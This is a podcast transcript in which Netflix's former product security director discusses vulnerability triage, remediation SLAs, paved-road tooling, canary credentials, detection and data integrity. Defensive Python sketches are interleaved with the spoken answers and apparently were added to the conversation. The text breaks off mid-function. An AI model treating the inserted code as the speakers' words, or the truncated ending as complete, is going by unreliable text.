
Season 7, Episode 109

Empowerment In Security With Bryan D. Payne

Guests:
Bryan D. Payne

Being passionate about security at a time when the industry hadn’t caught on yet, Bryan D. Payne found himself working for the National Security Agency (NSA). During his time there, and in the years that followed where he focused his efforts on research, he learned a number of valuable lessons which he was able to take with him, first to a small startup and then to the giant that is Netflix. In today’s conversation, Bryan and I discuss what his role as the Engineering Director of Product and Application Security at Netflix consisted of, the company culture, and how the teams within the company work together to achieve the most effective results. We also get into Bryan’s thoughts on detection methods, data integrity, and how to deal with mistakes that are inevitable when working in the security sphere.


[00:00:43] Announcer: Hi, you're listening to The Secure Developer. It's part of the DevSecCon community, a platform for developers, operators and security people to share their views and practices on DevSecOps, Dev and Sec collaboration, cloud security, and more. Check out devseccon.com to join the community and find other great resources.

This podcast is sponsored by Snyk. Snyk’s developer security platform helps developers build secure applications without slowing down, fixing vulnerabilities in code, open source containers and infrastructure as code. To learn more, visit snyk.io/tsd. That's snyk.io/tsd.

On today's episode, Guy Podjarny, founder of Snyk, talks to Bryan Payne, previously Engineering Director of Product and Application Security at Netflix. Bryan has worked on both offensive and defensive security projects for government, academia, and industry. As a result, he brings a unique perspective to modern security issues. Bryan is also working to help evolve the computer security community to be more welcoming and inclusive. Through this lens, he has worked with the USENIX Enigma Conference for years to reimagine what security conferences should look like. Similarly, he built Netflix's award-winning and impactful security engineering organization on the belief that we could better enable the business and reduce risk as a partner to other engineering teams rather than a gatekeeper. We hope you enjoy the conversation and don't forget to leave us a review on iTunes if you enjoy today's episode.

[INTERVIEW]

[00:02:25] Guy Podjarny: Hello, everyone. Welcome back to The Secure Developer. Today, we're going to talk about all things empowerment in security, maybe test some limits of the yin and the yang that you might apply to a modern product security program. And to talk about all of those and unravel them, we have Bryan Payne, who until recently has led much of security, including product and application security at Netflix.

Bryan, thanks for coming on to the show.

[00:02:49] Bryan Payne: Thanks for having me.

[00:02:50] Guy Podjarny: So Bryan, before we dig in, you're a free bird for the moment at the time of recording this podcast. But tell us a little bit about what that recent role at Netflix was, and maybe a bit about your journey getting into it?

[00:03:02] Bryan Payne: Sure. So at Netflix, I led our product security team, but for us, that was broader than just product security. It included infrastructure security, trust and safety, like fraud and abuse prevention. And it also had a pretty significant software engineering component where we built out identity systems, like authentication, authorization, cryptographic key management systems, PKI systems, things like that. We also had a program management team that kind of helped keep this honest and helped us interface with the rest of engineering across the company at Netflix.

But my journey to Netflix was perhaps a little different than most people in the field. I started a couple decades ago with the government. And my motivation at that time was just simply that I was very interested in security. And there weren't a lot of people in the industry that were doing security work. In fact, I'd interviewed at places like Google and Microsoft, and they didn't even have security teams to put me on.

And so I started at this place called the National Security Agency, because security was part of their name. And it seemed like a great place to go learn. And it was. I had a really interesting time there doing what we now call Blue Team security work, helping to do assessments and help military installations make their systems more secure.

It sort of took me down this lengthy path of research because I was interested in how we could make things better. It turns out that at that time, the state of the art in security was often turning the right knob in Windows to get something to be a little harder to hack. And I felt like that's not how the world should be.

And so I really went on this journey of, “Maybe I could improve it by doing research.” I was doing research at NSA. Did research for a DARPA contractor. Eventually, I went off and got my PhD and found my way over to Sandia National Labs to do more research. And I had a really interesting time through all of that, ultimately working on virtualization security and monitoring of virtual machines and these kinds of things. But eventually, I kind of got to the place where I realized that there wasn't a lot of information jumping from the research world back into industry.

And so I decided that to really have that broader impact, I wanted to be in industry myself. And that's what eventually brought me out to the San Francisco Bay Area, working for a startup for a few years, and then ultimately to Netflix.

[00:05:36] Guy Podjarny: Got it. Interesting route to it. It's funny that the term security doesn't always mean the same thing. The security in the NSA’s initials is not precisely the same as the security in a title you might get at Netflix. When you think about the work that you've done in these three sorts of settings, how transferable was the knowledge? I mean, what you've done from NSA to research, and then from research to industry, was it 20% knowledge transfer or 80%? Like how useful was the background coming into each of these new spaces?

[00:06:06] Bryan Payne: So it was absolutely helpful, but there was a lot to learn at each step, right? So part of what allows someone to be successful in a government setting is to be able to manage the bureaucracy, much less do your job. And what I found was that skill was less valuable in the private sector. Because in many cases, we might think of a company as being large and bureaucratic, but they can't be quite as large and bureaucratic as the government.

On the security side, though, I think one thing that I really value from my earlier years in the government is the ability to understand the nature of threats. And understand what an adversary can really do with, we’ll say, unlimited resources. And then understand that not every company is under that level of threat. And so kind of being able to balance your security posture appropriately based on the threats that you're seeing, and then have a very tangible sense of what those threats look like became very useful later in my career. And I don't know that I would have seen that quite so realistically had I not started where I did.

[00:07:17] Guy Podjarny: Yeah, that makes sense. And I guess that's the first balance, which is, I guess, not to abuse that Windows dial or button analogy, but how far do you want to turn up that dial?

[00:07:28] Bryan Payne: Absolutely.

[00:07:29] Guy Podjarny: In the sense of how strict and how constrained you need to be. That's an interesting background. I guess it gave you that sort of broad view. Eventually you got to Netflix, where presumably bureaucracy is fairly low on the totem pole, based on what is so well known and has been at the core of Netflix's success.

Maybe let's dig in a little bit into the balances of empowerment versus these controls, just to kick off that path. Can you describe a little bit, at a high level, how your group at Netflix worked between the security teams and the development teams? How does responsibility or authority sort of split up over there around the security decisions?

[00:08:10] Bryan Payne: Sure. So if you go read the Netflix culture memo on their website, one of the things that tends to pop out at people is this discussion of freedom and responsibility. And that is a concept that has driven how their engineering organization works over the years. It is interesting because, as humans, we tend to index on the freedom side. We say, “Oh, this is great. I can do whatever I want. And I'm sure I'm going to have to be responsible for something. But we'll figure that out.”

In reality, of course, there is a huge responsibility when you're building out software for a company like Netflix. You don't want that service to go down. So reliability matters deeply. You don't want it to be hacked. So security matters deeply. And so somehow, you need to be very responsible as an engineer as well. And I think as a security organization, we often saw ourselves as there to help support and enable the business. So what we wanted to do was allow the software engineers at the company to focus on the areas that they were hired for, effectively, right?

So if you were brought in as a distributed systems engineer, or an encoding engineer, something like this, that should be primarily what you're doing. You shouldn't be stuck dealing with PKI certificates and pulling your hair out. And so we would try to provide like turnkey services that allowed people to not have to worry about these fundamental security things.

And then, of course, they do still have to do something for security, right? They need to be aware of when they're dealing with sensitive information and maybe turn a little configuration knob to allow them to use an authentication system, those kinds of things.

But if they got to a place where security was really, really like critical to what they were doing, then they would be leaning on us for help. And exactly where that boundary is becomes a judgment call, that if you have a good relationship between the security team and the engineers, you can kind of figure that out.

[00:10:31] Guy Podjarny: And how does that – So I see how that works when it comes to PKI, or authentication, or things that are security-minded functionality that can be packaged up. It's still a good idea to take that off their plate. How does it work in terms of the grind, of the “upgrade your libraries because they’re vulnerable”, or “ensure you apply input validation to everything”, or shuffling to fix something when you need to balance that work against building some other feature?

[00:11:02] Bryan Payne: Unfortunately, patch management is still a thing. And we just saw this in December with Log4j, where everyone needed to quickly drop what they were doing and patch things. At the same time, updates come out all the time to software that we use. And not all of them are as critical as the Log4j update.

And so I think one of the important value adds that a security team can provide here is to help people quickly triage and assess what matters and what doesn't. And so what we would do is we would look at where a particular microservice sits within the ecosystem. Is it Internet-facing? What other systems does it connect to? What data does it process? And using all this information, you can start to figure out how important it is that this system is buttoned up to the nth degree, versus maybe we can let it slide. And when they do like a quarterly update of their OS, they'll just kind of get some patches, and we'll be good.

And so we would be able to make those assessments for the other teams and provide them with a dashboard that they could go to and they would see, “Hey, this is what actually matters today. If you're going to do something on security today, here's the top five things you can do to have a positive impact on your system.” And so that would help people kind of stay aligned.
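To make that triage idea concrete, here is a minimal sketch of context-based prioritization in Python. The factors and weights are illustrative assumptions, not Netflix's actual model; the point is simply that a raw severity score gets adjusted by where the service sits in the ecosystem before it ever reaches a team's dashboard.

```python
# Illustrative sketch of context-based vulnerability triage (not Netflix's
# actual model): score a finding by where the affected service sits in the
# ecosystem, then surface only the top items to the owning team.
from dataclasses import dataclass

@dataclass
class Service:
    name: str
    internet_facing: bool        # assumption: known from the asset inventory
    handles_sensitive_data: bool
    downstream_dependencies: int

def priority_score(base_cvss: float, svc: Service) -> float:
    """Weight a raw CVSS score by the service's blast radius."""
    score = base_cvss
    if svc.internet_facing:
        score *= 1.5
    if svc.handles_sensitive_data:
        score *= 1.3
    score += min(svc.downstream_dependencies, 10) * 0.1
    return round(score, 2)

findings = [
    ("CVE-2021-44228", 10.0, Service("api-gateway", True, True, 40)),
    ("CVE-2023-0001", 5.3, Service("batch-report", False, False, 2)),
]

# "Top N things you can do today" view, highest priority first.
for cve, cvss, svc in sorted(findings, key=lambda f: -priority_score(f[1], f[2])):
    print(f"{svc.name}: {cve} -> priority {priority_score(cvss, svc)}")
```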

And also, I think it helped to build a better relationship between the security and engineering teams, because we were no longer the ones who every day were saying, “Oh, my goodness! It's another fire drill. You have to go do this thing.” Instead, we would only come forward when it was something like Log4j and everyone said, “Yeah, this really is a big deal. Let's work together on it.”

[00:12:54] Guy Podjarny: I love the top X issues – if you were to invest in something today, here's what you would secure. Does that imply that the security team itself, though, needs to review every issue that comes out to classify it and say whether it's in 17th or 700th place? Or would the engineering team? There's an action here, there's a triage step here. Who does it? And how do you scale it?

[00:13:21] Bryan Payne: So at Netflix, this was the security team’s responsibility. And in order to manage that at scale, we had to start with understanding what the assets looked like across our ecosystem. And frankly, I think this is something that the security industry is starting to come to grips with, which is it's not particularly exciting, but maybe the most important thing you can do is to have a good asset inventory.

Because if you don't know what's out there, you can't possibly know what you're going to be trying to protect. So if you’ve accomplished that, if you know what software you have deployed and where it is, then you can pull in threat feeds and stuff like this, right? So you can see where the new CVEs are. You can use human intelligence. Maybe you picked up a lead on Twitter, right? You can use your bug bounty program for people telling you about different things that are coming in.

And so you have all of these different inputs. And for each of them, you can look across your asset inventory, and you can say, “Okay, I have a new vulnerability in Apache today. And where do I have Apache deployed? It's on all these systems. Which ones of those are going to matter for this kind of vulnerability? Okay, now we have another subset,” and you can kind of work through it. And so, typically, we would have an on-call analyst that would help with things. But they would only be engaged on the things that were particularly egregious, right? A very high CVSS score, or a bug bounty submission that comes in that's particularly urgent, right? Other things, you can triage through a little more automation. And if you get it slightly imperfect, it's probably going to be okay.
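As a rough sketch of that inventory-driven flow – and only a sketch, with assumed data shapes rather than any real Netflix tooling – the logic might look something like this:

```python
# Sketch of the inventory-driven triage flow described above: match a new
# advisory against deployed assets, auto-file low-severity items, and page
# the on-call analyst only for egregious ones. Data shapes are assumptions.
ASSET_INVENTORY = {
    "edge-proxy":    {"software": {"apache-httpd": "2.4.52"}, "internet_facing": True},
    "internal-wiki": {"software": {"apache-httpd": "2.4.49"}, "internet_facing": False},
    "media-encoder": {"software": {"ffmpeg": "4.4"},          "internet_facing": False},
}

def affected_assets(advisory: dict) -> list[str]:
    """Return the asset names that run the software named in the advisory."""
    return [name for name, meta in ASSET_INVENTORY.items()
            if advisory["package"] in meta["software"]]

def triage(advisory: dict) -> None:
    for asset in affected_assets(advisory):
        exposed = ASSET_INVENTORY[asset]["internet_facing"]
        if advisory["cvss"] >= 9.0 and exposed:
            print(f"PAGE on-call analyst: {advisory['id']} on {asset}")
        else:
            print(f"Queue to team dashboard: {advisory['id']} on {asset}")

triage({"id": "CVE-2021-41773", "package": "apache-httpd", "cvss": 9.8})
```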

[00:15:07] Guy Podjarny: I get it. So if I’m imagining the flow, just sort of echoing back. First, asset inventory. You have to be able to classify. At this point, it doesn't really matter who does it – it's a system that application teams and security teams have all fed information into, with some information automatically gleaned. You have a setup. And that already sets the bar of harshness, I guess, in terms of how strict you need to be around the security issues.

And then subsequently, the alerts are either auto-classified and put into the development team’s queue, I guess? Or they are flagged to an on-call. The dev team is not expected to be on call for security issues. The security team has that handled and might wake someone up in turn. But the issues that are auto-triaged, they do go into the backlog. Or are those also then being vetted by the security team?

[00:16:01] Bryan Payne: All the things tend to come through the security team. Before they would end up like paging an engineer, they would be assessed by a human to make sure that that page makes sense if something is of that severity. Things that are lower severity could go straight into this dashboard. That wouldn't page anyone, but it's the kind of thing that you could periodically check as an engineer to say, “Hey, what are the security things I should be working on?” And that way, we were very careful. We wouldn't want to reach out and ring the alarm bell unless we were 100% certain that this was actually something that mattered.

[00:16:41] Guy Podjarny: Okay, interesting. And so let's talk a little bit about the ranges here indeed, of responsibility. So, here, you have the freedom and responsibility, that famous, sadly infamous F&R of it. And as a security team, your job is to sort of filter and help the development team know what are the top items that they could invest in. And they work on it. How do you then see the ongoing tracking of whether these things have or have not been done? How do you think about the responsibility split to actually eventually act on these five issues? Is the security team tracking that? Or is it the engineering team?

[00:17:17] Bryan Payne: Right. So once again, security will track it in terms of time to remediation. In particular, they would set up an SLA for the severity of the security issue, right? So let's say it was a really egregious thing. Then they're going to want to close it out really fast. Let's say it's like a low or a medium, that could take a couple months, and that might be just fine.

And so the first step is to figure out like how long would you expect this to take? And then you can go back and you can start to say, “Well, how long did it take? Is it a problem?” Now, you don't always meet your targets. That's fine. And we wouldn't get particularly upset if someone missed something here or there. However, what you can look at is trend lines over time.
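A minimal sketch of that SLA-and-trend tracking, with made-up remediation windows (the actual SLAs would be set per organization), might look like:

```python
# Minimal sketch of SLA-based remediation tracking: map severity to a target
# remediation window and flag findings that have drifted past it. The
# specific windows are illustrative, not the SLAs Bryan's team used.
from datetime import date, timedelta

SLA_DAYS = {"critical": 7, "high": 30, "medium": 90, "low": 180}

def is_overdue(severity: str, opened: date, today: date = None) -> bool:
    today = today or date.today()
    return today - opened > timedelta(days=SLA_DAYS[severity])

open_findings = [
    {"team": "playback", "severity": "critical", "opened": date(2022, 1, 3)},
    {"team": "billing",  "severity": "medium",   "opened": date(2021, 11, 20)},
]

# Aggregated per team over time, data like this is what surfaces the
# organizations that consistently struggle to prioritize security work.
for f in open_findings:
    if is_overdue(f["severity"], f["opened"], today=date(2022, 2, 1)):
        print(f"{f['team']}: {f['severity']} finding past its SLA")
```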

And what I have typically seen is that you'll have some organizations that, anytime security put something in front of them, they're very good about just taking care of it. And then you have other organizations where security just never quite bubbles up for them. And so for me, it almost becomes more of a cultural, human kind of relationship challenge than a technical challenge at that point.

And with the information showing which teams are doing what, you're able to then go to the ones who are struggling to prioritize security and just sit down and have that conversation, “Hey, you know what? What's going on over here? Are you all really busy? Do you have some hard deadlines you're trying to meet? Have you not staffed enough to take care of your side of the security responsibility? Do you understand what your responsibility even is? Maybe we should talk through that.”

And I find that, frankly, by the time you have that kind of a conversation, people start to get it and they start to say, “Oh, maybe I didn't realize you were asking us to do this. But now I know. And we got it,” right? It's pretty rare that those things require three, four or five conversations before they get results. Because what I found is that people generally want to do the right thing. They just – They need a little guidance. Maybe they don't understand the prioritization of different things or how to think about it. But once you set that stage for them, you can get the results that you're looking for.

[00:19:28] Guy Podjarny: Yeah, I love that. So you've mentioned relationships several times here, because fundamentally, it sounds like, as a security team, you're building two types of services or two types of platforms. On one hand, it's this triage system, human-assisted or aided by the security team's cycles, to inform the dev teams about which issues they should address. But then subsequently, it's the mentoring, it's the guidance and maybe the probing that you do as a team. How do you structure the team to work that way? Is it just a central service organization, and you would go to whatever random team needed that support? Is it more of a partnership model where specific security people are affiliated with certain development teams?

[00:20:17] Bryan Payne: So this is going to get back to something that's going to be very different for each company, the level of security that they're trying to achieve, what sort of threats they're getting against them, and all of that. So I can speak a little bit to what we did at Netflix, but just with the intro that, hey, this may not be right for you, right?

At Netflix, what we tried to do was to assess where the biggest security risks were across the company. And we would use quantitative risk measurement mechanisms to kind of ballpark what that would look like. And then we could go into specific software systems and say, “These teams need the most support from security.” Think of it as your top five list, maybe it's 10, or 15. But for each of those teams, there's a dedicated security engineer, we would call them a security partner, who would work with those teams. And so you have a human that you can talk to, and you know it's always that same person.

And that was great, because you could build that relationship. And they would operate not at the level of just doing an assessment on the software and reporting a bunch of vulnerabilities, but more at the level of where's the business going for your chunk of software? And what is the architecture of the system? What sort of data are you transiting through your system? Right? What changes are in store in the next year or two? And how do we get ahead of that? And so they would try to sort of up-level all those conversations to make sure that security is being done well, really from the business perspective.

All of the rest of the company, then, which is really the vast majority of the software being built, did not have a dedicated human responsible for making sure it was secure. And so for those things, we would lean back on a couple of things. One is the systems that I described earlier, that would tell you your top five security things you need to address. And the other is what Netflix called the paved road. The paved road at Netflix is a set of software that it's a good idea for you to use.

Again, with freedom and responsibility, we don't require you to use it, but it's a good idea for you to use it. And if you do, you get very convenient RPC mechanisms, databases, base server, all the pieces that you might want. Oh, and by the way, when you use them, you get the security side effects that we want. And so if you use the paved road RPC mechanism, it's going to be authenticated already. It's going to have an Authz policy in place. You can tweak it if you want, but it's there, and you're just doing policy adjustments at this point. You're not trying to integrate it everywhere. And so all of those things meant that the vast majority of the company was in a really good place to start with. And we didn't have to stress too much about software defects because they wouldn't take you very far if they were exploited.
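As a purely hypothetical illustration of the paved road idea – none of these names are real Netflix APIs – a secure-by-default RPC client that only exposes policy tweaks might be sketched like this:

```python
# Hypothetical illustration of the "paved road" idea: a team-facing client
# factory that is secure by default (platform-managed identity, deny-by-default
# authz) and only exposes policy tweaks, not the underlying integration work.
# None of these names are real Netflix APIs.
from dataclasses import dataclass, field

@dataclass
class AuthzPolicy:
    allowed_callers: list = field(default_factory=list)  # deny all by default

@dataclass
class PavedRoadRpcClient:
    service: str
    policy: AuthzPolicy = field(default_factory=AuthzPolicy)

    def call(self, caller_identity: str, method: str, payload: dict) -> str:
        # Authentication is assumed to have happened via platform-issued mTLS
        # certificates; here we only check the caller against the policy.
        if caller_identity not in self.policy.allowed_callers:
            return f"DENIED: {caller_identity} may not call {self.service}.{method}"
        return f"OK: {self.service}.{method}({payload})"

# A product team only adjusts policy; authn, certs and wiring come for free.
client = PavedRoadRpcClient("recommendations", AuthzPolicy(["playback-service"]))
print(client.call("playback-service", "top_n", {"user": 42}))
print(client.call("unknown-service", "top_n", {"user": 42}))
```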

[00:23:32] Guy Podjarny: Yeah, that makes a lot of sense. I love the paved road concept. And I've been using and abusing it in many places, because it is a great notion of, if you make it easy, people will opt-in at the end of the day unless they have a good reason not to. Versus if you bash them on the head and keep telling them they need to, you might create quite the opposite reaction.

[00:23:54] Bryan Payne: Absolutely.

[00:23:54] Guy Podjarny: So I love the delineation. It seems very smart to focus on the items that are at the top – managing your security investment based on the risk that gets represented, versus just some even spread where everybody gets the same type of solution.

Can we maybe shift gears a little bit? I think this sounds like a great sort of service-oriented security team satisfying the different parts of the organization. And we talked a little bit about measurement – maybe a little bit less focused on metrics and KPIs and things like that, and more on awareness and working with the right teams.

Let's talk a little bit about iteration. So you actually gave this very interesting industry-wide talk at AppSec Cali a couple years ago – I think the title was Fail, Learn, Fix. And, just a bit of a rant on my end: I know that the DevOps industry has been very predicated on this notion of iteration, of saying, “It's fine if you have some problems in production as long as you identify and fix them quickly; it's better to do that than to get into some paralysis mode of trying to find every single problem before you ever deploy it.” And people got forgiving on the notion of a hiccup in your uptime. Not always that forgiving, but maybe a bit of an acceptance there.

Security is not necessarily well known for being a forgiving setup. You can't just say, “Look, I'll have a mini breach here, and that's okay.” How do you think about iteration? How do you think indeed about failing, about making that productive in security?

[00:25:29] Bryan Payne: So I think security professionals end up with a lot of stress. And I think a lot of that stress comes from this mindset that you're just saying, which is like, “We can't have a mistake.” And at the end of the day, security professionals are humans, just like all the rest of us. And that means we will be making mistakes.

And so for me, the first step here is to just acknowledge that, even in security, we're going to have mistakes. There's going to be, like you said, mini breaches. Not M, A, N Y, but M, I, N, I breaches, right? And I think, if you can step past that, and start to say, “Okay. Then what? In a world where this is going to happen, how do we make it okay?”

And pretty quickly, I think you get to the place that you say, “Well, not all breaches are the same,” right? There's a breach, and then there's a breach, right? There are ones where you're putting customer data or sensitive information at risk. Like these are really bad things, and you don't want those to happen. But every day, you've got people coming in through bug bounty programs, finding mistakes in your software that you had no idea were there. And each one of those is an opportunity to learn.

And really, I think that's what a good incident response program is all about, right? You want to quickly assess the situation. You want to button it up. But you want to learn, and you want to figure out, how do we then evolve forward so that this kind of thing doesn't turn into one of those bigger breaches that's a really bad day, and it stays at this level of a learning breach, right? Of course, you'll learn from the big ones too, but those are probably not the best ones to learn from. We like to learn from the little ones so we don't have those really big ones.

[00:27:41] Guy Podjarny: How do you gain visibility to those? I mean, again, kind of drawing the DevOps analogy, generally you’d say it's fine for you to deploy more rapidly. But to do so, you have to have some observability in place, otherwise you wouldn't know that you've gone down. So you lose the opportunity to learn. What’s the equivalent observability that you need to spot these mini mistakes in security?

[00:28:07] Bryan Payne: This is the whole world of detection at some level. And it's rich and diverse. And it's going to depend on what you have deployed. I've seen a variety of interesting things work over the years. One that I particularly like is the use of canaries, because it's a little non-traditional, perhaps, right? So when I say non-traditional, I mentioned that I started my work in the research world. And at that time, everyone was really looking at anomaly detection systems. Like, “I'm going to monitor this thing, and I'm going to find the needle in the haystack. I'm going to tell you when there's a problem.” And they just never really worked that great, because it's really hard to do that, especially when you look at the scale of a place like Netflix or something, finding that needle in the haystack can be really hard.

Canaries can flip the game over, right? So in this case, I'm talking about can I put an AWS key on an instance that looks, for all practical purposes, legit. An attacker would see it and say, “Oh, my goodness, I just found something particularly interesting.” They test it out. They see if it works. And lo and behold, as soon as they do, all your alarm bells go off, because that key should never be used, right?

And so now all of a sudden, it's like a little trip wire that the attacker ran into, and now you know that they're there. It depends on what your infrastructure is. But stuff like that can work really well in certain settings. Other things that we've toyed with that could be fun. Think about architectures where you have an auto-scaling group. You have a whole bunch of instances that should look identical to each other. And so now you can start to say, “Well, maybe I can monitor these. And all I'm doing is checking out the differences between those instances. And if one deviates too far, then I'm going to be a little concerned,” right? And so you've got like a baseline that you can check on. So you can do this kind of stuff.
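For the auto-scaling group idea, a toy version of the "identical instances should stay identical" check could be as simple as diffing a per-instance inventory against the group's most common baseline. The data shape here is assumed; in practice it would come from whatever host agent you already run.

```python
# Sketch of the "identical instances should stay identical" idea: compare a
# simple per-instance inventory (here, listening ports) across an auto-scaling
# group and flag any instance that deviates from its peers.
from collections import Counter

instance_ports = {
    "i-0a1": {22, 443},
    "i-0a2": {22, 443},
    "i-0a3": {22, 443, 4444},   # unexpected listener
}

def flag_outliers(inventory: dict) -> list[str]:
    """Treat the most common port set as the baseline; flag anything else."""
    baseline, _ = Counter(frozenset(v) for v in inventory.values()).most_common(1)[0]
    return [iid for iid, ports in inventory.items() if frozenset(ports) != baseline]

print(flag_outliers(instance_ports))   # ['i-0a3']
```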

Interestingly, though, even with all the research and all the state-of-the-art that we have, a lot of detections come back to things that are much simpler, right? A software engineering team is monitoring their systems and they notice that the CPU load is outside of the range that they would expect. And they start looking into it. They say, “Whoa, I don't like what I'm seeing here. It looks like someone SSH’d into this box. And I don't know why.” They call over the security team. You spin up an incident. And you learn.

So I think things like this tend to be, even today, how a lot of things are found. There's arguably room to improve there. But pragmatically, I think that is an important signal. And I think that's part of the reason that you want to have a good relationship between security and software teams.

[00:30:50] Guy Podjarny: First of all, I love the idea of the canaries. To sort of probe on it, these canaries would be within systems? So you'll take a server whose file system an attacker shouldn't have access to, and you would put a key on it. It's not the same as putting a key on an open S3 bucket and testing attackers out in the open. That's not the goal here. But rather putting it on a place the attacker should not be able to reach?

[00:31:13] Bryan Payne: That's exactly right. Yeah. So I mean, sure, you can put it on an S3 bucket and see if anyone starts enumerating your stuff. That could be interesting. But it might be noisier. So the idea here would be to just throw it on the root folder of a system, or maybe a place that, if the web server has been popped, would be part of what they could enumerate. You want to be at least one stage into the attack at that point, right? And then they start to see it and say, “Oh, I'm succeeding. I got something right.” So the attacker starts to trigger it.
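One way such a canary credential might be watched – a sketch under assumptions, not a description of Netflix's setup – is to poll AWS CloudTrail for any activity attributed to the decoy access key. The key ID below is a placeholder, and a production deployment would more likely alert through an event rule than by polling.

```python
# One possible way to alert on a decoy ("canary") AWS access key being used:
# poll CloudTrail for any API activity attributed to that key. The key ID
# below is a placeholder; that key should never be used legitimately.
import boto3
from datetime import datetime, timedelta, timezone

CANARY_ACCESS_KEY_ID = "AKIAEXAMPLECANARY000"   # decoy key planted on the host

def canary_was_used(lookback_minutes: int = 15) -> bool:
    client = boto3.client("cloudtrail")
    events = client.lookup_events(
        LookupAttributes=[{"AttributeKey": "AccessKeyId",
                           "AttributeValue": CANARY_ACCESS_KEY_ID}],
        StartTime=datetime.now(timezone.utc) - timedelta(minutes=lookback_minutes),
    )
    return len(events.get("Events", [])) > 0

if canary_was_used():
    print("ALERT: canary credential used -- likely intrusion, page security on-call")
```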

[00:31:42] Guy Podjarny: Yeah. I love the idea. It's actually new to me, you know. So maybe I’m just behind here. But I love it. Is there some design system for this? Some open source project or some tool that can help with that?

[00:31:53] Bryan Payne: I'm not aware of an open source project on it. It is an idea that we've talked a little bit about at, I believe, AppSec USA in the past. I'd have to double-check that. But you can look for some talks from Netflix on the Netflix security YouTube channel. I'm pretty sure we've spoken about these canaries in the past.

[00:32:11] Guy Podjarny: Yeah. No. Excellent. And so the canaries are great. I also love the meta idea that, no matter how much you've invested in these types of indicators, learning from incidents and from the actual little failures that you've identified is the strength of it. So with that, I think we have time for maybe one more topic.

I'd love to talk – Indeed, you mentioned relationship is a fair bit. But you also mentioned platforms, and technology, and paved roads. How do you think about the tech versus human side of security when you think about scaling, developer security, scaling sort of securing the applications? What's your view or philosophy about the things that should be solved with tech and the things that cannot need the human touch?

[00:33:04] Bryan Payne: I think we can solve a surprisingly large amount through tech. But I think it's not as simple as just saying tech or human. Because to solve it through tech, you have to think about the human in a sense. You need to make the systems easier to use. I gave a presentation many years ago where I compared the PyCrypto library to the OpenSSL library for what a software engineer has to do to correctly encrypt some data. And one was encrypt(data), and then it's correct. And the other was 100 lines of code. And then you have to ask yourself, “Well, even if you hire the best software engineers in the world, where are you more likely to see a problem?”
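For a sense of the abstraction gap Bryan is describing, the high-level end of the spectrum looks roughly like this – shown here with the Python cryptography package's Fernet recipe as a stand-in, which may not be the exact library he compared:

```python
# Illustrating the "encrypt(data) and it's correct" point with the Python
# `cryptography` package's Fernet recipe; this may not be the exact library
# pair Bryan compared, but it shows the abstraction-level difference.
from cryptography.fernet import Fernet

key = Fernet.generate_key()          # key management still matters, of course
token = Fernet(key).encrypt(b"some sensitive data")
print(Fernet(key).decrypt(token))    # b'some sensitive data'
```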

For me, we can solve a lot of these problems through tech, but we have to find the right abstraction layers, and set it up in a way so that people can correctly accomplish their tasks without so much extra mental processing that they are set up for failure. So I think that's sort of step one. And I think part of that will be continuing to reevaluate where the abstraction layer should be. If you think about things like infrastructure as a service, you're running your software on someone else's hardware. And then you look at platform as a service, you're running your software on a slightly more abstracted set of systems, right? And the latter might be easier to create a good security story around, because higher abstraction layers allow for some of the more challenging security problems to be solved once and done, as opposed to a whole bunch of times. So I think that will be interesting to see.

Even with all that, though, humans are very much an important part of the picture. Because at the end of the day, you can write software and you can be focused on what you're doing, but we're going to keep making mistakes. The way we've built computers, there will be security problems. And so there's going to be people that are better at knowing the security implications to the business, and people that are better at writing the software that the business needs. And somehow, they're going to have to work together to allow the business to move forward with the appropriate level of risk. And that's the human element of it.

And so, the security teams that I've seen that are most successful are the ones that acknowledge that people don't love to go talk to security. We kind of have a bad reputation sometimes of being a little difficult or a little stubborn. And so if you can avoid being those things, right? If you can be more welcoming. If you can find better language to use. Just kind of better customer service, in a sense. Then you can build those relationships in a way that starts to make things easier for everyone. And then it makes it easier for people in the company that aren't security experts to feel like it's okay to go lean on the security team.

[00:36:22] Guy Podjarny: No. That's very, very well said. I guess I'd be remiss not to mention that the whole ethos, really, when it came to Snyk, was to try and build a developer tool. So first and foremost, the usability to developers. And then subsequently achieve a security goal with it. But I think a lot of it really revolves around the usability of the tech, which I guess was the first point, at least, that you related to. So never easy. And, hopefully, sometimes we did better, sometimes we did worse, but a similar lens of view.

So, Bryan, tons of great insights over here. And I have probably about three or four different things that I still want to ask you about. I think we're kind of coming up on time here. Before I let you off to enjoy some of the freedom that you have right now, just maybe a bit of a forward-looking question. So when you look at the industry – so far we've talked about organizations and maybe practices – if you had unlimited budgets and resources at your disposal, what problem that we're facing right now would you say we need to solve, or that you would take on? And maybe a little bit about what approach would you take?

[00:37:33] Bryan Payne: The one problem that I keep scratching my head on has to do with integrity of data. And I mean this in a very classical sense. If you go back to the days of mandatory access controls and these original sort of military systems that were built, they looked at data from different integrity levels. And like data coming off the internet from a client would be very low integrity data. Data from a trusted system would be high integrity data. And in no sense should you ever have low integrity data influencing the execution of a high integrity system, for example. And so mandatory access controls were able to sort of set you up so that wouldn't happen. That was many, many decades ago that people were building systems like this.

And then last month, Log4j happens. And it is almost exactly that situation, where a client can send data that ultimately gets executed. And you have to ask, why is it that after all these years we're still suffering from the same problems? And the best answer I've come up with is just that it's so complicated, that to do these kinds of controls on modern systems becomes intractable.

I go back to a time when I was in the room with the creators of SELinux and the creators of AppArmor, two competing mandatory access control systems. AppArmor was a little more user-friendly. And SELinux was super fine-grained, and you could control everything. And the creators of SELinux said this was necessary because the system that they're protecting is that complicated, the Linux kernel. So you can't have a policy that's less complicated than the kernel because you're protecting the kernel, which intuitively makes sense. But it also means no one's going to use it. How many times have you booted up a system and found that SELinux was on and said, “Well, I think I'll just disable that so I can get my job done”?

Now, things have been getting better over the years, to be sure. But how do we come back to this data integrity problem? How do we create a world where, sure, Log4j is vulnerable? But you know what? You can't exploit it. Because that's low integrity data and it shouldn't be doing anything to your system. I would love to take a stab at that and figure out how do we make that better? So that, frankly, entire classes of vulnerabilities go from being really, really high to really, really low. And it’s a, “We'll patch it when we have time,” situation. I think that would be a game-changer for how we think about security. I think, frankly, it hasn't been solved just because it's pretty complicated. And I'm not suggesting that I have a magic, really clever idea of how to solve it right now. But it's certainly something that's been on my mind over the years. And if I come up with a cool solution, I would be all over that.
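A toy illustration of that integrity principle – labeling data by origin and refusing to let low-integrity input reach an execution-influencing sink – might look like the sketch below. This is an analogy for the idea, not a real mandatory access control mechanism.

```python
# Toy illustration of the integrity-level principle described above: label
# data by its origin and refuse to let low-integrity (client-supplied) data
# reach a sink that influences execution.
from dataclasses import dataclass

LOW, HIGH = 0, 1

@dataclass
class Labeled:
    value: str
    integrity: int

def evaluate_template(data: Labeled) -> str:
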